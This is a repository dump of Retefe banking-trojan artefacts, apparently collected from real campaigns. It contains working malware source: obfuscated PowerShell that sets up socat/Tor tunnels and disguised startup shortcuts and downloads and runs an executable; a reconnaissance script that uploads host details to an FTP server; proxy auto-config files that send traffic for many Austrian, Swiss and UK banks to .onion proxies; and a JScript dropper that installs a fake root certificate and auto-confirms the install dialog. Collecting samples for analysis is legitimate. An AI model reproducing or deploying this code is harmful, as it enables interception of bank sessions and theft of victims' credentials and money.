$IOTuhLvm=$env:ALLUSERSPROFILE+'\socat-windows-1.7.2.1.7z'; 155 | $ZfPpnOsIwMP=(RandomString); 156 | IgewPfCUf $IOTuhLvm $DestTP; 157 | $mXULIpHUVBrEYif=$DestTP+'\socat-windows-1.7.2.1\'; 158 | Rename-Item -path $mXULIpHUVBrEYif -newName $ZfPpnOsIwMP; 159 | $eyj=$DestTP+'\'+$ZfPpnOsIwMP+'\'; 160 | Remove-Item -Force $IOTuhLvm; 161 | $s1cmd='socat tcp4-LISTEN:5070,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050'; 162 | $s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050'; 163 | $rFCeOtJGkZyN="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))"; 164 | $hxNmZso="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))"; 165 | BmruWvxEDIoNRA (RandomString) 'mshta.exe' $rFCeOtJGkZyN 0 0 $eyj; 166 | BmruWvxEDIoNRA (RandomString) 'mshta.exe' $hxNmZso 0 0 $eyj; 167 | 168 | Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\acrobat.lnk" $eyj $rFCeOtJGkZyN 169 | Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\sync.lnk" $eyj $hxNmZso 170 | 171 | $pRIhb="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'\\"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))"; 172 | BmruWvxEDIoNRA (RandomString) 'mshta.exe' $pRIhb 1; 173 | #Set directory permissions 174 | $Rights = "Read, ReadAndExecute, ListDirectory"; 175 | $acl = Get-Acl $MwFU; 176 | $acl|Select -expand Access|ForEach-Object { 177 | $perm = $_.IdentityReference, $Rights, $_.InheritanceFlags, $_.PropagationFlags, "Allow"; 178 | $rule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule -ArgumentList $perm; 179 | $acl.SetAccessRule($rule); 180 | } 181 | $acl.SetAccessRuleProtection($True, $False); 182 | $acl | Set-Acl -Path $MwFU; 183 | } 184 | uPFITobIk; 185 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # retefe 2 | Artefacts from various retefe campaigns 3 | 4 | 5 | ## Sources 6 | ### Potential sources for various methods/funtions 7 | 1. QuasarRAT/Client/Core/Recovery/Browsers/Firefox.cs 8 | * https://github.com/quasar/QuasarRAT/blob/master/Client/Core/Recovery/Browsers/Firefox.cs 9 | 2. Pastebin: Firefox 37+ Password & Cookie Recovery 10 | * http://pastebin.com/Qzctxjet 11 | 3. PowerShell Code Repository: Using Task Sch, wrapper by BattleChicken 12 | * http://poshcode.org/5805 13 | 4. Получить handle дочернего окна - C# 14 | * http://www.cyberforum.ru/csharp-net/thread656891.html 15 | -------------------------------------------------------------------------------- /StartWork.ps1: -------------------------------------------------------------------------------- 1 | $Logfile = $env:Temp+"\\$(gc env:computername).log"; 2 | 3 | Function LogWrite 4 | { 5 | Param ([string]$logstring) 6 | $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss"; 7 | $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring); 8 | Write-Host $msg; 9 | Add-content $Logfile -value $msg; 10 | } 11 | Function UploadLog 12 | { 13 | $dest = "ftp://XXXXXXXX"; 14 | $wc = New-Object -TypeName System.Net.WebClient; 15 | $wc.UploadFile("$dest/$(gc env:computername).log", $Logfile); 16 | Remove-Item -Path $Logfile; 17 | } 18 | function CheckInstall(){ 19 | $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages); 20 | $wininfo.MUILanguages=$wininfo.MUILanguages -join ","; 21 | LogWrite("OS info: {0}" -f $wininfo -join ""); 22 | if (test-path variable:psversiontable) { 23 | $version = $psversiontable.psversion; 24 | } else { 25 | $version = [version]"1.0.0.0"; 26 | } 27 | LogWrite("Powershell version: {0}" -f $version); 28 | try { 29 | $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop; 30 | LogWrite("Pac setted: '$pac'"); 31 | } 32 | catch { 33 | LogWrite("ERROR: Pac not setted"); 34 | } 35 | $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)}); 36 | if (-NOT $Certs.count -eq 0){ 37 | LogWrite("Certs installed: '{0}'" -f ($Certs -join "; ")); 38 | }else { 39 | LogWrite("Certs not found"); 40 | } 41 | try{ 42 | $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out; 43 | LogWrite("Proccess list:`n{0}" -f ($proc -join "`n")); 44 | } 45 | catch { 46 | LogWrite("ERROR: Can't get proccess list"); 47 | } 48 | $DestTP=$env:ALLUSERSPROFILE; 49 | try{ 50 | $dirs=dir($DestTP) -ErrorAction Stop; 51 | LogWrite("List dir [{0}]: {1}" -f ($DestTP, (($dirs|Select -expand Name) -join "; "))); 52 | foreach($dir in $dirs){ 53 | try{ 54 | $subdir=dir($dir.FullName) -ErrorAction Stop; 55 | LogWrite("List dir [{0}]:{1}" -f ($dir.FullName, (($subdir|Select -expand Name) -join "; "))); 56 | } 57 | catch{ 58 | LogWrite("ERROR: Can't list dir {0}" -f $dir.FullName); 59 | } 60 | } 61 | } 62 | catch { 63 | LogWrite("ERROR: Can't list dir {0}" -f $DestTP); 64 | } 65 | 66 | $avlist=(Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct" @psboundparameters|Select -expand DisplayName); 67 | if (-NOT $avlist.count -eq 0){ 68 | LogWrite("Av found: '{0}'" -f ($avlist -join "| ")); 69 | }else { 70 | LogWrite("Av not found"); 71 | } 72 | } 73 | function StartWork(){ 74 | LogWrite "Start Log module"; 75 | Start-Sleep -s 3; 76 | CheckInstall; 77 | UploadLog; 78 | } 79 | StartWork; 80 | -------------------------------------------------------------------------------- /proxy_pac_at.js: -------------------------------------------------------------------------------- 1 | function FindProxyForURL(url, host) { 2 | var proxy = "PROXY 6aaoqcl2leiptpvn.onion:5588;"; 3 | var hosts = new Array('*bankaustria.at', '*.bawagpsk.com', '*raiffeisen.at', 4 | '*.bawag.com', 'www.banking.co.at', '*oberbank.at', 5 | 'www.oberbank-banking.at', '*.easybank.at'); 6 | for (var i = 0; i < hosts.length; i++) { 7 | if (shExpMatch(host, hosts[i])) { 8 | return proxy 9 | } 10 | } 11 | return "DIRECT" 12 | } 13 | -------------------------------------------------------------------------------- /proxy_pac_ch.js: -------------------------------------------------------------------------------- 1 | function FindProxyForURL(url, host) { 2 | var proxy = "PROXY aztqlm4tslmpgkau.onion:5588;"; 3 | var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch', 4 | '*ubs.com', 'tb.raiffeisendirect.ch', '*bkb.ch', '*lukb.ch', 5 | '*zkb.ch', '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', 6 | '*bcge.ch', '*raiffeisen.ch', '*credit-suisse.com', '*.clientis.ch', 7 | 'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch', 8 | 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*eek.ch', '*szkb.ch', 9 | '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', 10 | '*bcf.ch', 'ebanking.raiffeisen.ch', '*bcv.ch', '*juliusbaer.com', 11 | '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch', 12 | '*valiant.ch', '*wir.ch', '*bankthalwil.ch', '*piguetgalland.ch', 13 | '*triba.ch', '*inlinea.ch', '*bernerlandbank.ch', 14 | '*bancasempione.ch', '*bsibank.com', '*corneronline.ch', 15 | '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch', 16 | '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', 17 | '*hbl.ch', '*ersparniskasse.ch', '*ekr.ch', 18 | '*sparkasse-dielsdorf.ch', '*eki.ch', '*bankgantrisch.ch', 19 | '*bbobank.ch', '*alpharheintalbank.ch', '*aekbank.ch', 20 | '*acrevis.ch', '*credinvest.ch', '*bancazarattini.ch', '*appkb.ch', 21 | '*arabbank.ch', '*apbank.ch', '*notenstein-laroche.ch', 22 | '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', 23 | '*bordier.com', '*banquethaler.com', '*bankzimmerberg.ch', 24 | '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch', 25 | '*banquecramer.ch', '*banqueduleman.ch', '*bcpconnect.com', 26 | '*bil.com', '*vontobel.com', '*pbgate.net', '*bnpparibas.com', 27 | '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch', 28 | '*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', 29 | '*cbhbank.com', '*coutts.com', '*cimbanque.net', '*cembra.ch', 30 | '*commerzbank.com', '*dominickco.ch', '*efginternational.com', 31 | '*exane.com', '*falconpb.com', '*gemeinschaftsbank.ch', 32 | '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', 33 | '*ca-financements.ch', '*hsbcprivatebank.com', 34 | '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', 35 | '*mmwarburg.ch', '*maerki-baumann.ch', '*mirabaud.com', 36 | '*nordea.ch', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', 37 | '*reyl.com', '*saanenbank.ch', '*sebgroup.com', '*slguerbetal.ch', 38 | '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', 39 | '*slwynigen.ch', '*sparkasse.ch', '*umtb.ch', '*trafina.ch', 40 | '*ubp.com'); 41 | for (var i = 0; i < hosts.length; i++) { 42 | if (shExpMatch(host, hosts[i])) { 43 | return proxy 44 | } 45 | } 46 | return "DIRECT" 47 | } 48 | -------------------------------------------------------------------------------- /proxy_pac_uk.js: -------------------------------------------------------------------------------- 1 | function FindProxyForURL(url, host) { 2 | var proxy = "PROXY log5moxngjoys52g.onion:88;"; 3 | var hosts = new Array('*barclays.co.uk', '*natwest.com', '*nwolb.com', 4 | 'hsbc.co.uk', 'www.hsbc.co.uk', '*business.hsbc.co.uk', 5 | '*santander.co.uk', '*rbsdigital.com', 6 | 'onlinebusiness.lloydsbank.co.uk', '*cahoot.com', '*smile.co.uk', 7 | '*co-operativebank.co.uk', 'if.com', '*.if.com', 8 | '*ulsterbankanytimebanking.co.uk', '*sainsburysbank.co.uk', 9 | '*tescobank.com', '*halifax-online.co.uk', '*halifax.co.uk', 10 | '*lloydsbank.co.uk', '*lloydstsb.com'); 11 | for (var i = 0; i < hosts.length; i++) { 12 | if (shExpMatch(host, hosts[i])) { 13 | return proxy 14 | } 15 | } 16 | return "DIRECT" 17 | } 18 | -------------------------------------------------------------------------------- /retefe.js: -------------------------------------------------------------------------------- 1 | var Exp = null; 2 | var Fire = null; 3 | var TP = null; 4 | var wss = new ActiveXObject("WScript.Shell"); 5 | var fso = new ActiveXObject("Scripting.FileSystemObject"); 6 | var BINARY_STREAM_TYPE = 1; 7 | var TEXT_STREAM_TYPE = 2; 8 | var CREATE_OVERWRITE_SAVE_MODE = 2; 9 | var ENV_TEMP = wss.ExpandEnvironmentStrings("%TEMP%"); 10 | var ENV_APPDATA = wss.ExpandEnvironmentStrings("%APPDATA%"); 11 | var Cfg = { 12 | dl: ["paoyu7gub72lykuk.onion", "5kybfrm53fkdgktz.onion", 13 | "s4c3jh2qqxyqfknh.onion", "s5jhnylq4yi7omen.onion" 14 | ], 15 | cert: "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", 16 | ps: "ZnVuY3Rpb24gQ29uZmlybUNlcnR7DQpBZGQtVHlwZSBAIg0KdXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLlRleHQ7DQp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5Llg1MDlDZXJ0aWZpY2F0ZXM7DQp1c2luZyBTeXN0ZW0uVGhyZWFkaW5nOw0KDQpwdWJsaWMgc3RhdGljIGNsYXNzIFcNCnsNCglwdWJsaWMgY2xhc3MgU0QNCiAgICB7DQogICAgICAgIHB1YmxpYyBzdHJpbmcgV25kY2xhc3M7DQogICAgICAgIHB1YmxpYyBzdHJpbmcgVGl0bGU7DQogICAgICAgIHB1YmxpYyBzdHJpbmcgUHJvY2VzczsNCiAgICAgICAgcHVibGljIEludFB0ciBoV25kOw0KICAgIH0NCg0KICAgIHByaXZhdGUgZGVsZWdhdGUgYm9vbCBFbnVtV2luZG93c1Byb2MoSW50UHRyIGhXbmQsIHJlZiBTRCBkYXRhKTsNCg0KICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICBbcmV0dXJuOiBNYXJzaGFsQXMoVW5tYW5hZ2VkVHlwZS5Cb29sKV0NCiAgICBwcml2YXRlIHN0YXRpYyBleHRlcm4gYm9vbCBFbnVtV2luZG93cyhFbnVtV2luZG93c1Byb2MgbHBFbnVtRnVuYywgcmVmIFNEIGRhdGEpOw0KCQ0KCVtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBTZXRMYXN0RXJyb3IgPSB0cnVlLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvKV0NCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0Q2xhc3NOYW1lKEludFB0ciBoV25kLCBTdHJpbmdCdWlsZGVyIGxwQ2xhc3NOYW1lLCBpbnQgbk1heENvdW50KTsNCg0KICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0NCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0V2luZG93VGV4dChJbnRQdHIgaFduZCwgU3RyaW5nQnVpbGRlciBscFN0cmluZywgaW50IG5NYXhDb3VudCk7DQoJDQoJW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIFNldExhc3RFcnJvciA9IHRydWUsIENoYXJTZXQgPSBDaGFyU2V0LkF1dG8pXQ0KCXN0YXRpYyBleHRlcm4gdWludCBHZXRXaW5kb3dUaHJlYWRQcm9jZXNzSWQoSW50UHRyIGhXbmQsIG91dCB1aW50IGxwZHdQcm9jZXNzSWQpOw0KCQ0KCVtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCglbcmV0dXJuOiBNYXJzaGFsQXMoVW5tYW5hZ2VkVHlwZS5Cb29sKV0NCglzdGF0aWMgZXh0ZXJuIGJvb2wgU2V0Rm9yZWdyb3VuZFdpbmRvdyhJbnRQdHIgaFduZCk7DQoJDQoJcHVibGljIGRlbGVnYXRlIGJvb2wgRW51bVdpbmRvd1Byb2MoSW50UHRyIGh3bmQsIEludFB0ciBsUGFyYW0pOw0KCQ0KCVtEbGxJbXBvcnQoInVzZXIzMiIpXQ0KCVtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgRW51bUNoaWxkV2luZG93cyhJbnRQdHIgd2luZG93LCBFbnVtV2luZG93UHJvYyBjYWxsYmFjaywgSW50UHRyIGxQYXJhbSk7ICANCgkNCglbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldCA9IENoYXJTZXQuQXV0byldDQoJc3RhdGljIGV4dGVybiBJbnRQdHIgU2VuZE1lc3NhZ2UoSW50UHRyIGhXbmQsIFVJbnQzMiBNc2csIEludFB0ciB3UGFyYW0sIEludFB0ciBsUGFyYW0pOw0KCQ0KCVtGbGFnc10NCiAgICBwcml2YXRlIGVudW0gU25hcHNob3RGbGFncyA6IHVpbnQNCiAgICB7DQogICAgSGVhcExpc3QgPSAweDAwMDAwMDAxLA0KICAgIFByb2Nlc3MgPSAweDAwMDAwMDAyLA0KICAgIFRocmVhZCA9IDB4MDAwMDAwMDQsDQogICAgTW9kdWxlID0gMHgwMDAwMDAwOCwNCiAgICBNb2R1bGUzMiA9IDB4MDAwMDAwMTAsDQogICAgSW5oZXJpdCA9IDB4ODAwMDAwMDAsDQogICAgQWxsID0gMHgwMDAwMDAxRiwNCiAgICBOb0hlYXBzID0gMHg0MDAwMDAwMA0KICAgIH0NCiAgICAvL2lubmVyIHN0cnVjdCB1c2VkIG9ubHkgaW50ZXJuYWxseQ0KICAgIFtTdHJ1Y3RMYXlvdXQoTGF5b3V0S2luZC5TZXF1ZW50aWFsLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvKV0NCiAgICBwcml2YXRlIHN0cnVjdCBQUk9DRVNTRU5UUlkzMg0KICAgIHsNCiAgICBjb25zdCBpbnQgTUFYX1BBVEggPSAyNjA7DQogICAgaW50ZXJuYWwgVUludDMyIGR3U2l6ZTsNCiAgICBpbnRlcm5hbCBVSW50MzIgY250VXNhZ2U7DQogICAgaW50ZXJuYWwgVUludDMyIHRoMzJQcm9jZXNzSUQ7DQogICAgaW50ZXJuYWwgSW50UHRyIHRoMzJEZWZhdWx0SGVhcElEOw0KICAgIGludGVybmFsIFVJbnQzMiB0aDMyTW9kdWxlSUQ7DQogICAgaW50ZXJuYWwgVUludDMyIGNudFRocmVhZHM7DQogICAgaW50ZXJuYWwgVUludDMyIHRoMzJQYXJlbnRQcm9jZXNzSUQ7DQogICAgaW50ZXJuYWwgSW50MzIgcGNQcmlDbGFzc0Jhc2U7DQogICAgaW50ZXJuYWwgVUludDMyIGR3RmxhZ3M7DQogICAgW01hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJ5VmFsVFN0ciwgU2l6ZUNvbnN0ID0gTUFYX1BBVEgpXQ0KICAgIGludGVybmFsIHN0cmluZyBzekV4ZUZpbGU7DQogICAgfQ0KDQogICAgW0RsbEltcG9ydCgia2VybmVsMzIiLCBTZXRMYXN0RXJyb3IgPSB0cnVlLCBDaGFyU2V0ID0gU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkNoYXJTZXQuQXV0byldDQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90KFtJbl1VSW50MzIgZHdGbGFncywgW0luXVVJbnQzMiB0aDMyUHJvY2Vzc0lEKTsNCg0KICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSwgQ2hhclNldCA9IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5DaGFyU2V0LkF1dG8pXQ0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQcm9jZXNzMzJGaXJzdChbSW5dSW50UHRyIGhTbmFwc2hvdCwgcmVmIFBST0NFU1NFTlRSWTMyIGxwcGUpOw0KDQogICAgW0RsbEltcG9ydCgia2VybmVsMzIiLCBTZXRMYXN0RXJyb3IgPSB0cnVlLCBDaGFyU2V0ID0gU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkNoYXJTZXQuQXV0byldDQogICAgc3RhdGljIGV4dGVybiBib29sIFByb2Nlc3MzMk5leHQoW0luXUludFB0ciBoU25hcHNob3QsIHJlZiBQUk9DRVNTRU5UUlkzMiBscHBlKTsNCg0KICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSldDQogICAgW3JldHVybjogTWFyc2hhbEFzKFVubWFuYWdlZFR5cGUuQm9vbCldDQogICAgcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIGJvb2wgQ2xvc2VIYW5kbGUoW0luXSBJbnRQdHIgaE9iamVjdCk7DQogICAgDQoJY29uc3QgaW50IEJNX0NMSUNLID0gMHgwMEY1Ow0KCQ0KCXB1YmxpYyBzdGF0aWMgYnl0ZVtdIEdldENlcnRBc0J5dGVBcnJheShTdHJpbmcgc0NlcnQpDQogICAgew0KCQlyZXR1cm4gQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKHNDZXJ0KTsNCiAgICB9DQogICAgICAgIA0KCXB1YmxpYyBzdGF0aWMgdm9pZCBTKFN0cmluZyBzQ2VydCl7DQogICAgICAgIGJ5dGVbXSBiQ2VydCA9IEdldENlcnRBc0J5dGVBcnJheShzQ2VydCk7DQogICAgICAgIGlmIChiQ2VydCAhPSBudWxsKQ0KICAgICAgICB7DQogICAgICAgICAgICBYNTA5Q2VydGlmaWNhdGUyIGNlcnRpZmljYXRlID0gbmV3IFg1MDlDZXJ0aWZpY2F0ZTIoYkNlcnQpOw0KICAgICAgICAgICAgWDUwOVN0b3JlIHN0b3JlID0gbmV3IFg1MDlTdG9yZShTdG9yZU5hbWUuUm9vdCwgU3RvcmVMb2NhdGlvbi5DdXJyZW50VXNlcik7DQogICAgICAgICAgICBzdG9yZS5PcGVuKE9wZW5GbGFncy5SZWFkV3JpdGUpOw0KICAgICAgICAgICAgaWYgKCFzdG9yZS5DZXJ0aWZpY2F0ZXMuQ29udGFpbnMoY2VydGlmaWNhdGUpKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIFRocmVhZCB0aHJlYWQgPSBuZXcgVGhyZWFkKFNlYXJjaERpYWxvZyk7DQogICAgICAgICAgICAgICAgdGhyZWFkLlN0YXJ0KCk7DQogICAgICAgICAgICAgICAgc3RvcmUuQWRkKGNlcnRpZmljYXRlKTsNCiAgICAgICAgICAgICAgICB0aHJlYWQuSm9pbigpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgc3RvcmUuQ2xvc2UoKTsNCiAgICAgICAgfQ0KCX0NCgkNCglwdWJsaWMgc3RhdGljIHZvaWQgU2VhcmNoRGlhbG9nKCkNCgl7DQoJCUludFB0ciBoV25kOw0KCQlkb3sNCgkJCWhXbmQgPSBTZWFyY2hGb3JXaW5kb3coIiMzMjc3MCIsU3RyaW5nLkVtcHR5KTsNCgkJCWlmICghaFduZC5FcXVhbHMoSW50UHRyLlplcm8pKQ0KCQkgICAgew0KCQkgICAgCWJyZWFrOw0KCQkJfWVsc2UNCgkgICAgICAgIHsNCgkJICAgICAgICBoV25kPUludFB0ci5aZXJvOw0KCSAgICAgICAgfQ0KCQl9d2hpbGUgKGhXbmQuRXF1YWxzKEludFB0ci5aZXJvKSk7DQoJCVNldEZvcmVncm91bmRXaW5kb3coaFduZCk7DQoJCUVudW1XaW5kb3dQcm9jIGNoaWxkUHJvYyA9IG5ldyBFbnVtV2luZG93UHJvYyhFQ1cpOw0KCQlFbnVtQ2hpbGRXaW5kb3dzKGhXbmQsIGNoaWxkUHJvYywgSW50UHRyLlplcm8pOw0KCX0NCgkNCglwdWJsaWMgc3RhdGljIEludFB0ciBTZWFyY2hGb3JXaW5kb3coc3RyaW5nIHduZGNsYXNzLCBzdHJpbmcgdGl0bGUpDQogICAgew0KICAgICAgICBTRCBzZCA9IG5ldyBTRCgpOw0KICAgICAgICBzZC5XbmRjbGFzcyA9IHduZGNsYXNzOw0KICAgICAgICBzZC5UaXRsZSA9IHRpdGxlOw0KICAgICAgICBzZC5oV25kPUludFB0ci5aZXJvOw0KICAgICAgICBFbnVtV2luZG93cyhuZXcgRW51bVdpbmRvd3NQcm9jKEVudW1Qcm9jKSwgcmVmIHNkKTsNCiAgICAgICAgcmV0dXJuIHNkLmhXbmQ7DQogICAgfQ0KICAgIA0KCXB1YmxpYyBzdGF0aWMgYm9vbCBFbnVtUHJvYyhJbnRQdHIgaFduZCwgcmVmIFNEIGRhdGEpDQogICAgew0KICAgIAlTdHJpbmdCdWlsZGVyIGNhcHRpb24gPSBuZXcgU3RyaW5nQnVpbGRlcigxMDI0KTsNCiAgICAgICAgU3RyaW5nQnVpbGRlciBjbGFzc05hbWUgPSBuZXcgU3RyaW5nQnVpbGRlcigxMDI0KTsNCiAgICAgICAgR2V0V2luZG93VGV4dChoV25kLCBjYXB0aW9uLCBjYXB0aW9